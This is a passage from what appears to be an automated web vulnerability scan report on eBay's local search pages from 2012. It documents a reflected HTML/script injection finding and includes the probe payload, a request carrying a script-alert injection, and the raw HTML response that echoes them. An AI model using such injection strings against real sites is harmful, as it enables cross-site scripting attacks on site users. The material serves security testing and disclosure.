href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab0f55cc1340a5e2c6324c52ff8bfe90");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height: 100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
function $4(){return function(event){return this.init();};};_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.filter.Filter);_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.categorylist.CategoryList);_d.add('body','load',function(event) { this.initFS(); },vjo.ebay.local.srp.filmstrip.Filmstrip);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.setLocalProducts({"item_1":[{"merchant_title":"Lowe's","merchant_id":"4483","lng":"-96.443819","store_link":null,"price":null,"logo":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png","lat":"32.743819"}],"item_2":[{"merchant_title":"Lowe's","merchant_id":"4483","lng":"-96.443819","store_link":null,"price":null,"logo":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png","lat":"32.743819"}]}); },vjo.ebay.local.srp.map.localpickup.LocalPickupMap);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8b4030-->

1.2. http://local.ebay.com/local/localsch.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/localsch.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af3d8"><a>a42023be879 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /local/localsch.htmlaf3d8"><a>a42023be879?_nkw=rxss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef9b03a124f3=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8b778c
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpPtYWM4Yjc3OGMxMzQwYTAyYTA5NTFmZTYxZmZmZmUzNzkA7gBsTwaT7Wh0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbC9sb2NhbHNjaC5odG1sYWYzZDgiPjxhPmE0MjAyM2JlODc5P19ua3c9cnhzcyZfZnBvcz03NTIxNyZfZmxwcmFkPTI1LjAmX2NhdGlkPWSEOc0*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0PtYWM4Yjc3OGMxMzQwYTAyYTA5NTFmZTYxZmZmZmUzNzkAywABTwVJdTEt6v4I; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:25:48 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 29285
Date: Thu, 05 Jan 2012 06:25:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - rxss</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325719836074" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325719836074;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AD1WaLJI*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=rxss&amp;_fpos=75217&amp;_inclfltr=1" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>    
   
   
       <div class="cat-W">
           <H4 class="cat-hdr">By Category</H4>
           <div class="cat-lst">
               <ul id="parUl">
                   
                   <li>
                   
                       
                       <a href="javascript:;" clk="1" class="ch"></a><a href="http://local.ebay.com:80/local/localsch.htmlaf3d8"><a>a42023be879?_trksid=p5791.m1&_catid=12576&_location=75217&_nkw=rxss&dc13b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef9b03a124f3=1&_fpos=75217">Business & Industrial</a>                        
                                   
                       
                           <ul class="dn">
                               
                                   <li>                                        
                                       <a href="http://local.ebay.com:80/local/localsch.htmlaf3d8"><a>a42023be879?_trksid=p5791.m1&_catid=11765&_location=75217&_nkw=rxss&dc13b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef9b03a124f3=1&_fpos=75217">Construction </a>                                        
                                   </li>
                               
                           </ul>
                       
                       
                   </li>
                   
                   
               </ul>
           </div>
       </div>

       </div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>
<div class="fltr-W">
   <h4 class="fltr-hdr">BRAND</h4>
   <div class="fltr-lst">    
        <div name="filterForm" id="filterForm" style="max-height:250px;overflow:hidden">
           <div style="position:absolute;width:5px;right:5px;top:0;height:100%;z-index:1;">
                       <div id="dragelm" style="position: absolute; display:none;width: 5px; height: 30px; background: none repeat scroll 0% 0% #333; right: 0pt; top: -1px; left: 0px;">
                       </div>
           </div>
           <ul id="brandUl">            
               
               

               <li>                            
                        <div class="cb">    
                           <a href="javascript:;" title="Roxul" brand="Roxul" class=" ">Roxul</a>
                        </div>    
                       
               </li>

           
                       
           </ul>
       </div>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div id="fs">
<h4 class="fsHeader">Local Retailers :</h4><div class="fs" id="fs">
<span class="preS"><a class="pre db" id="pre" href="javascript:;"></a></span>
<div class="cntWrap" id="cntWrap">
<div class="cnt" id="cnt"><a href="javascript:;" title="Lowe's"><img class="" src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" merchant="4483" en="1" /><div class="msk"></div></a>
</div>
</div><span class="nextS"><a class="next db " id="next" href="javascript:;"></a></span>
<div class="clr"></div>
</div>
</div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=rxss" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='rxss' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
               
                   <input type="hidden" value="rxss" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="156"><div style="font-size: 13px; font-family: Arial; padding: 3px 0 0 0; color: #333333;float:left">2 results found</div><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
</div></div><div style="margin-top:2px; float:right"><div></div><div style="clear:both"></div></div><div style="clear:both"></div></div></div><div>
<div class="lstWrap" id="lstWrap">

<div class="lst" type="products" id="item_1" offers="8679175">
<table cellspacing="0" cellpadding="0" border="0">
   <tr class="lstTr">
       <td class="imgContTd">
           <a href="javascript:;">
               <img width="140" height="140" border="0" alt="TEST TUBE WONDERS" src="http://imagethumbnails.milo.com/008/679/624/200/8679175_9912624_200.jpg" />
           </a>
       </td>
       <td>
           <div class="lstInfo">
               <div class="ttlDiv"><a class="ttl" target="_blank" title='Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts' href="http://www.ebay.com/ctg/mp.html?_flppid=7641623&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m2&_fpos=75217">Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts</a></div>
               <div><span class="rw" style="height: 12px; background-position: 0pt -10px;">
<span class="rstar" style="height: 12px; background-position: 0pt 1px; width: 67.5px"></span>
</span><span class="revCnt">(6)</span></div>
               <div class="retTtl"><span class="catTtl">Carried at 1 retailer</span></div>
               <div class="brandDiv">
                       
                       <a href="javascript:;" storetype="storeicon" mid="4483"><img src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" class="st-img" /></a>
                   
               </div>        
           </div>
       </td>
       <td class="priTd">
           <div class="priDiv">
               N/A
           </div>
       </td>
   </tr>
</table>
<div class="beak"></div>
</div>    

<div class="lst" type="products" id="item_2" offers="10585778">
<table cellspacing="0" cellpadding="0" border="0">
   <tr class="lstTr">
       <td class="imgContTd">
           <a href="javascript:;">
               <img width="140" height="140" border="0" alt="TEST TUBE WONDERS" src="http://imagethumbnails.milo.com/010/585/025/200/10585778_13912025_200.jpg" />
           </a>
       </td>
       <td>
           <div class="lstInfo">
               <div class="ttlDiv"><a class="ttl" target="_blank" title='Roxul 12-Pack 15.25"W x R-0 Fiberglass Insulation Batts' href="http://www.ebay.com/ctg/mp.html?_flppid=9436383&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m2&_fpos=75217">Roxul 12-Pack 15.25"W x R-0 Fiberglass Insulation Batts</a></div>
               <div><span class="rw" style="height: 12px; background-position: 0pt -10px;">
<span class="rstar" style="height: 12px; background-position: 0pt 1px; width: 67.5px"></span>
</span><span class="revCnt">(10)</span></div>
               <div class="retTtl"><span class="catTtl">Carried at 1 retailer</span></div>
               <div class="brandDiv">
                       
                       <a href="javascript:;" storetype="storeicon" mid="4483"><img src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" class="st-img" /></a>
                   
               </div>        
           </div>
       </td>
       <td class="priTd">
           <div class="priDiv">
               N/A
           </div>
       </td>
   </tr>
</table>
<div class="beak"></div>
</div>    

<div id="lstloading" class="lst-load"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div>    
</div>
</div><div><div style="padding:5px; background-color:#F5F5F5"><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
